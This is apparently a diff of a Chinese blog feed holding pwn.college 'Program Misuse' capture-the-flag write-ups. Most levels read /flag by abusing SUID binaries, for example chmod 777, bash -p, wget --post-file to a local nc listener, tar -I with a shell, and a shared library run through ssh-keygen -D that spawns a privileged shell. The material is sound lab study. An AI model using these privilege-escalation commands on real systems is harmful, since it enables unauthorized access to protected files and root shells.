+<h3 id="29"><a href="#29" class="headerlink" title="29"></a>29</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">stdbuf</span> -i0 <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="30"><a href="#30" class="headerlink" title="30"></a>30</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">setarch $(<span class="built_in">arch</span>) <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="31"><a href="#31" class="headerlink" title="31"></a>31</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">watch -x <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="32"><a href="#32" class="headerlink" title="32"></a>32</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">socat -u FILE:/flag STDOUT</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="33"><a href="#33" class="headerlink" title="33"></a>33</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">whiptail --textbox --scrolltext /flag 20 80</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="34"><a href="#34" class="headerlink" title="34"></a>34</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">awk <span class="string">&#x27;&#123;print&#125;&#x27;</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="35"><a href="#35" class="headerlink" title="35"></a>35</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">sed -n <span class="string">&#x27;p&#x27;</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="36"><a href="#36" class="headerlink" title="36"></a>36</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">ed /flag</span><br><span class="line">,p</span><br></pre></td></tr></table></figure></div>
+<p>or</p>
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> n | ed /flag</span><br></pre></td></tr></table></figure></div>
+<p>打开名为 <code>/flag</code> 的文件，并向 <code>ed</code> 命令传递了字符 <code>n</code>。在 <code>ed</code> 编辑器中，<code>n</code> 通常用于打印当前行的内容。</p>
+<h3 id="37"><a href="#37" class="headerlink" title="37"></a>37</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">chown</span> -c hacker /flag</span><br><span class="line"><span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="38"><a href="#38" class="headerlink" title="38"></a>38</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">chmod</span> 777 /flag &amp;&amp; <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="39"><a href="#39" class="headerlink" title="39"></a>39</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cp</span> /flag /dev/stdout</span><br></pre></td></tr></table></figure></div>
+<p>震惊!原来还可以这样输出!</p>
+<h3 id="40"><a href="#40" class="headerlink" title="40"></a>40</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">mv</span> /usr/bin/cat /usr/bin/mv</span><br><span class="line"></span><br><span class="line"><span class="built_in">mv</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="41"><a href="#41" class="headerlink" title="41"></a>41</h3><p>perl脚本</p>
+<div class="highlight-container" data-rel="Perl"><figure class="iseeu highlight perl"><table><tr><td class="code"><pre><span class="line"><span class="keyword">my</span> $flags=<span class="string">&quot;/flag&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">open</span>(<span class="keyword">my</span> $flag,<span class="string">&#x27;&lt;&#x27;</span>,$flags) <span class="keyword">or</span> <span class="keyword">die</span> <span class="string">&quot;Could not open file: $!&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="keyword">my</span> $line = &lt;$flag&gt;)&#123;</span><br><span class="line">        <span class="keyword">print</span> $line;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">close</span> ($flag);</span><br></pre></td></tr></table></figure></div>
+<p>perl脚本和bash脚本的区别:<br>        Perl（Practical Extraction and Reporting Language）和Bash（Bourne-Again Shell）是两种不同的编程语言，它们有一些显著的区别：<br>        1. <strong>用途</strong>:<br>            - <strong>Perl</strong> 是一种通用的编程语言，专注于文本处理、数据转换、报告生成、正则表达式和系统管理等任务。Perl通常用于处理复杂的文本操作和数据处理任务。<br>            - <strong>Bash</strong> 是一种Unix Shell脚本语言，用于操作和自动化命令行环境中的任务。Bash通常用于执行系统命令、管理文件系统、编写简单的脚本以及处理系统级任务。<br>        2. <strong>语法</strong>:<br>            - <strong>Perl</strong> 具有一种更灵活和强大的语法，支持面向对象编程、函数式编程、正则表达式和高级数据结构。它有强大的字符串处理能力和大量的内置模块。<br>            - <strong>Bash</strong> 的语法相对较简单，主要用于执行命令和控制流操作。它适用于简单的脚本编写和自动化任务。<br>        3. <strong>数据类型</strong>:<br>            - <strong>Perl</strong> 具有更多的内置数据类型，包括标量（scalar）、数组（array）、哈希（hash）以及对象。它对数据处理和数据结构操作更为灵活。<br>            - <strong>Bash</strong> 主要处理文本和字符串，虽然可以处理数组，但对于更复杂的数据结构支持较弱。<br>        4. <strong>模块和库</strong>:<br>            - <strong>Perl</strong> 拥有丰富的模块和库，涵盖了各种领域，可以加速开发。CPAN（Comprehensive Perl Archive Network）是Perl社区的模块存储库，包含了大量的开源模块。<br>            - <strong>Bash</strong> 虽然有一些内置的函数和工具，但它的生态系统相对较小，通常需要依赖于外部工具和命令行实用程序来执行复杂的任务。<br>        5. <strong>适用场景</strong>:<br>            - <strong>Perl</strong> 更适合于需要复杂文本处理、正则表达式、数据转换、网络编程、脚本测试和大型应用程序开发等任务。<br>            - <strong>Bash</strong> 更适合于系统管理、自动化任务、批处理处理、简单脚本编写以及与命令行工具的交互。<br>        总之，Perl和Bash是两种不同的编程语言，各自在不同的领域和用途中具有优势。选择使用哪种语言取决于您要解决的具体问题和任务的性质。有时，它们也可以结合使用，以充分利用各自的优势。</p>
+<h3 id="42"><a href="#42" class="headerlink" title="42"></a>42</h3><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;/flag&quot;</span>,<span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    content = file.read()</span><br><span class="line">    <span class="built_in">print</span>(content)</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="43"><a href="#43" class="headerlink" title="43"></a>43</h3><div class="highlight-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="code"><pre><span class="line">flag = <span class="string">&quot;/flag&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">begin</span></span><br><span class="line">  file = <span class="title class_">File</span>.open(flag,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">  content = file.read</span><br><span class="line">  puts content</span><br><span class="line"><span class="keyword">rescue</span> <span class="title class_">Errno</span><span class="symbol">:</span><span class="symbol">:ENOENT</span></span><br><span class="line">  puts <span class="string">&quot;File &#x27;<span class="subst">#&#123;flag&#125;</span>&#x27; not fount.&quot;</span></span><br><span class="line"><span class="keyword">rescue</span> <span class="title class_">StandardError</span> =&gt; e</span><br><span class="line">  puts <span class="string">&quot;An error occurred: <span class="subst">#&#123;e&#125;</span>&quot;</span></span><br><span class="line"><span class="keyword">ensure</span></span><br><span class="line">  file.close <span class="keyword">if</span> file</span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="44"><a href="#44" class="headerlink" title="44"></a>44</h3><p>本题最开始是和上面一样尝试写一个bash脚本，然后使用bash命令去执行，但发现依然没有权限访问flag。</p>
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/usr/bin/bash</span></span><br><span class="line">filename=<span class="string">&quot;/flag&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ ! -f <span class="string">&quot;<span class="variable">$filename</span>&quot;</span> ]; <span class="keyword">then</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;File &#x27;<span class="variable">$filename</span>&#x27; not found.&quot;</span></span><br><span class="line">  <span class="built_in">exit</span> 1</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> IFS= <span class="built_in">read</span> -r line; <span class="keyword">do</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$line</span>&quot;</span></span><br><span class="line"><span class="keyword">done</span> &lt; <span class="string">&quot;<span class="variable">$filename</span>&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure></div>
+
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/usr/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /flag</span><br><span class="line"></span><br><span class="line"><span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure></div>
+<p>以上两个均会报错权限不允许<br>后经查阅发现是需要使用<code>bash -p</code> 进行提权，它的意思是以安全模式启动<code>bash</code>，因为在这里<code>bash</code>设置了<code>SUID</code> ，所以在这里是执行了之后相当于在当前命令行下执行的命令都具有bash命令的权限，然后直接使用<code>cat /flag</code> 就好了</p>
+<h3 id="45"><a href="#45" class="headerlink" title="45"></a>45</h3><p>在经过查阅<code>date</code>命令并进行尝试后试出答案，理论上是使用<code>date</code>命令直接报错输出<code>/flag</code>里面的内容</p>
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">date</span> -f /flag</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
+
+<h3 id="46"><a href="#46" class="headerlink" title="46"></a>46</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">demsg -F /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="47"><a href="#47" class="headerlink" title="47"></a>47</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">wc</span> -l --files0-from=/flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="48"><a href="#48" class="headerlink" title="48"></a>48</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gcc -E -x c /flag</span><br></pre></td></tr></table></figure></div>
+<p>本题最初是想写一个c文件编译读取，但写完后发现不行，和<code>bash</code>那个一样<a href="###44">44</a>，经查阅后发现需要这样读取<code>/flag</code></p>
+<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> result = system(<span class="string">&quot;cat /flag&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (result == <span class="number">-1</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;Error executing cat command&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
+
+
+<p>这条命令告诉<code>gcc</code>命令执行预处理操作，以处理<code>/flag</code>文件中的C语言代码，<code>-E</code> 表示执行预处理操作而不进行编译，<code>-x c</code>用于指定输入文件的类型，表示输入文件是C语言代码。</p>
+<h3 id="49"><a href="#49" class="headerlink" title="49"></a>49</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">as -a /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="50"><a href="#50" class="headerlink" title="50"></a>50</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">nc -lp 8088 &amp; wget --post-file=/flag http://127.0.0.1:8088</span><br></pre></td></tr></table></figure></div>
+
+<p>查看wget命令后使用了-i参数读取，读取出来了但是都是小写，没有通过，后经查阅发现需要这样使用</p>
+<h3 id="51"><a href="#51" class="headerlink" title="51"></a>51</h3><p><a class="link"   href="https://www.youtube.com/watch?v=14mIjpOXnrM&t=2878s" >related resource <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   href="https://www.bilibili.com/video/BV1ok4y1m75p/" >b站提取video <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
+<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">inject</span><span class="params">()</span> __<span class="title function_">attribute__</span><span class="params">((constructor))</span>;</span><br><span class="line"><span class="type">void</span> <span class="title function_">C_GetFunctionList</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;euid:%d\n&quot;</span>,geteuid());</span><br><span class="line">    sendfile(<span class="number">1</span>,open(<span class="string">&quot;/flag&quot;</span>,<span class="number">0</span>),<span class="number">0</span>,<span class="number">4096</span>);</span><br><span class="line">    <span class="comment">//system(&quot;cp /bin/bash /tmp/bash &amp;&amp; chmod +s /tmp/bash &amp;&amp; /tmp/bash -p&quot;);</span></span><br><span class="line">    <span class="type">char</span> *argvv[]=&#123;<span class="string">&quot;bash&quot;</span>,<span class="string">&quot;-p&quot;</span>,<span class="literal">NULL</span>&#125;;</span><br><span class="line">    execvp(<span class="string">&quot;/bin/bash&quot;</span>,argvv);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
+
+<p>best answer</p>
+<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">C_GetFunctionList</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    sendfile(<span class="number">1</span>,open(<span class="string">&quot;/flag&quot;</span>,<span class="number">0</span>),<span class="number">0</span>,<span class="number">4096</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
+
+
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gcc level51.c -shared -o su.os</span><br><span class="line">ssh-keygen -D ./su.os</span><br></pre></td></tr></table></figure></div>
+
+<p>首先翻阅man page可以看到ssh-keygen用-D参数可以直接运行任意的共享库，如果有suid的话就能运行我们的恶意代码造成提权</p>
+<p>c程序中可以利用&lt;dlfcn.h&gt;头文件中的一系列函数dlopen，dlclose来加载运行共享库。</p>
+<p>gcc可以通过<code>-shared</code>参数来创建共享库，共享库不能单独运行，它相当于一个必须被别人调用才能运行的程序，它与普通二进制程序的区别可以通过file命令来查看，共享库没有<code>interpreter</code>这样的字段，也就是没有链接解释器。%</p>
+]]></content>
+      <tags>
+        <tag>pwn</tag>
+      </tags>
+  </entry>
   <entry>
     <title>Program Interaction</title>
     <url>/2023/10/26/Interaction/</url>
@@ -734,156 +885,6 @@
 <div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line">  </span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PORT 1858</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SIZE 1024</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">pwncollege</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">ainb</span><span class="params">(<span class="type">char</span>* a,<span class="type">char</span>* b)</span>&#123;</span><br><span class="line">    <span class="type">long</span> <span class="type">unsigned</span> <span class="type">int</span> len1=<span class="built_in">strlen</span>(a);</span><br><span class="line">    <span class="type">long</span> <span class="type">unsigned</span> <span class="type">int</span> len2=<span class="built_in">strlen</span>(b);</span><br><span class="line">    <span class="comment">//printf(&quot;len(a):%ld\n&quot;,len1);</span></span><br><span class="line">    <span class="comment">//printf(&quot;len(b):%ld\n&quot;,len2);</span></span><br><span class="line">    <span class="keyword">if</span>(len1&gt;len2) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="type">int</span> xflag=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;len2-len1;i++)&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">strncmp</span>(a,b+i,len1)==<span class="number">0</span>)&#123;</span><br><span class="line">            xflag=<span class="number">1</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> xflag;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc,<span class="type">char</span>* argv[],<span class="type">char</span>* env[])</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> client_socket = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);   <span class="comment">//创建和服务器连接套接字</span></span><br><span class="line">    <span class="keyword">if</span>(client_socket == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        perror(<span class="string">&quot;socket&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">addr</span>;</span></span><br><span class="line">    <span class="built_in">memset</span>(&amp;addr, <span class="number">0</span>, <span class="keyword">sizeof</span>(addr));</span><br><span class="line">    addr.sin_family = AF_INET;  <span class="comment">/* Internet地址族 */</span></span><br><span class="line">    addr.sin_port = htons(PORT);  <span class="comment">/* 端口号 */</span></span><br><span class="line">    addr.sin_addr.s_addr = htonl(INADDR_ANY);   <span class="comment">/* IP地址 */</span></span><br><span class="line">    inet_aton(<span class="string">&quot;127.0.0.1&quot;</span>, &amp;(addr.sin_addr));</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> addrlen = <span class="keyword">sizeof</span>(addr);</span><br><span class="line">    <span class="type">int</span> listen_socket =  connect(client_socket,  (<span class="keyword">struct</span> sockaddr *)&amp;addr, addrlen);  <span class="comment">//连接服务器</span></span><br><span class="line">    <span class="keyword">if</span>(listen_socket == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        perror(<span class="string">&quot;connect&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;成功连接到一个服务器\n&quot;</span>);</span><br><span class="line">    <span class="type">char</span> buf[SIZE] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)        <span class="comment">//向服务器发送数据，并接收服务器转换后的大写字母</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">//读取服务器内容</span></span><br><span class="line">        <span class="comment">//int ret = read(client_socket, buf, strlen(buf));</span></span><br><span class="line">        <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">            <span class="built_in">memset</span>(buf, <span class="number">0</span>, SIZE);<span class="comment">//每次读取前重置</span></span><br><span class="line">            ret = read(client_socket, buf, SIZE);</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;ret = %d\n&quot;</span>, ret);</span><br><span class="line">            <span class="keyword">if</span>(<span class="number">0</span>&gt;=ret) <span class="keyword">break</span>;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;buf = %s&quot;</span>, buf);</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="number">1</span>==ainb(<span class="string">&quot;Please send the solution for: &quot;</span>,buf))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;请输入你要输入的：&quot;</span>);</span><br><span class="line">        <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, buf);</span><br><span class="line">        write(client_socket, buf, <span class="built_in">strlen</span>(buf));</span><br><span class="line">        write(client_socket, <span class="string">&quot;\n&quot;</span>, <span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    close(listen_socket);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
 
 <p>这里就是用C语言实现了一个<code>socket</code>连接，然后获取输出，再手动计算结果(因为C语言的计算写起来很复杂)输入给程序，最后运行完成获得<code>flag</code></p>
-]]></content>
-      <tags>
-        <tag>pwn</tag>
-      </tags>
-  </entry>
-  <entry>
-    <title>Program Misuse</title>
-    <url>/2023/09/24/ProgramMisuse/</url>
-    <content><![CDATA[<p>这里记录的是ASU 466课程的解题记录,<a class="link"   href="https://pwn.college/" >pwn <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>,这一小节的题目只要学会看<code>man page</code>就能写出来。</p>
-<h3 id="1"><a href="#1" class="headerlink" title="1"></a>1</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="2"><a href="#2" class="headerlink" title="2"></a>2</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">more /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="3"><a href="#3" class="headerlink" title="3"></a>3</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">less /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="4"><a href="#4" class="headerlink" title="4"></a>4</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">tail</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="5"><a href="#5" class="headerlink" title="5"></a>5</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">head</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="6"><a href="#6" class="headerlink" title="6"></a>6</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">sort</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="7"><a href="#7" class="headerlink" title="7"></a>7</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">vim /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="8"><a href="#8" class="headerlink" title="8"></a>8</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">emacs /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="9"><a href="#9" class="headerlink" title="9"></a>9</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">nano /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="10"><a href="#10" class="headerlink" title="10"></a>10</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">rev /flag | rev</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="11"><a href="#11" class="headerlink" title="11"></a>11</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">od</span> -w100 -c /flag | sed <span class="string">&#x27;s# ##g&#x27;</span></span><br></pre></td></tr></table></figure></div>
-
-<h3 id="12"><a href="#12" class="headerlink" title="12"></a>12</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">hd -f /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="13"><a href="#13" class="headerlink" title="13"></a>13</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">xxd /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="14"><a href="#14" class="headerlink" title="14"></a>14</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">base32</span> /flag | <span class="built_in">base32</span> -d</span><br></pre></td></tr></table></figure></div>
-<p>注意这里不能直接<code>base32 -d /flag</code>，因为<code>-d</code>参数要有东西才能解码，所以要先用<code>base32</code>把<code>/flag</code>读出来</p>
-<h3 id="15"><a href="#15" class="headerlink" title="15"></a>15</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">base64</span> /flag | <span class="built_in">base64</span> -d</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="16"><a href="#16" class="headerlink" title="16"></a>16</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">split</span> /flag</span><br><span class="line"><span class="built_in">cat</span> xaa</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="17"><a href="#17" class="headerlink" title="17"></a>17</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gzip -c /flag | gzip -d</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="18"><a href="#18" class="headerlink" title="18"></a>18</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">bzip2 -c /flag | bzip2 -d</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="19"><a href="#19" class="headerlink" title="19"></a>19</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">zip -r /flag.zip /flag</span><br><span class="line">unzip -p /flag</span><br></pre></td></tr></table></figure></div>
-<p>这里要注意<code>zip</code>命令的顺序，是被压缩后的名字在前，要压缩的文件在后，要加上<code>-r</code>参数</p>
-<h3 id="20"><a href="#20" class="headerlink" title="20"></a>20</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">tar -cvf flag.tar /flag</span><br><span class="line">tar xf flag.tar -O</span><br></pre></td></tr></table></figure></div>
-<p>or</p>
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">tar xf /flag -I <span class="string">&#x27;/bin/sh -c &quot;cat 1&gt;&amp;2&quot;&#x27;</span></span><br></pre></td></tr></table></figure></div>
-<p>第一个是延续压缩+解压的思路，下面是在网上看到的，利用<code>-I</code>参数执行额外程序的方法获得<code>flag</code></p>
-<h3 id="21"><a href="#21" class="headerlink" title="21"></a>21</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">ar -q flag.ar /flag</span><br><span class="line"><span class="built_in">cat</span> flag.ar</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="22"><a href="#22" class="headerlink" title="22"></a>22</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;/flag&quot;</span> | cpio -o &gt; flag.cpio</span><br><span class="line"><span class="built_in">cat</span> flag.cpio</span><br></pre></td></tr></table></figure></div>
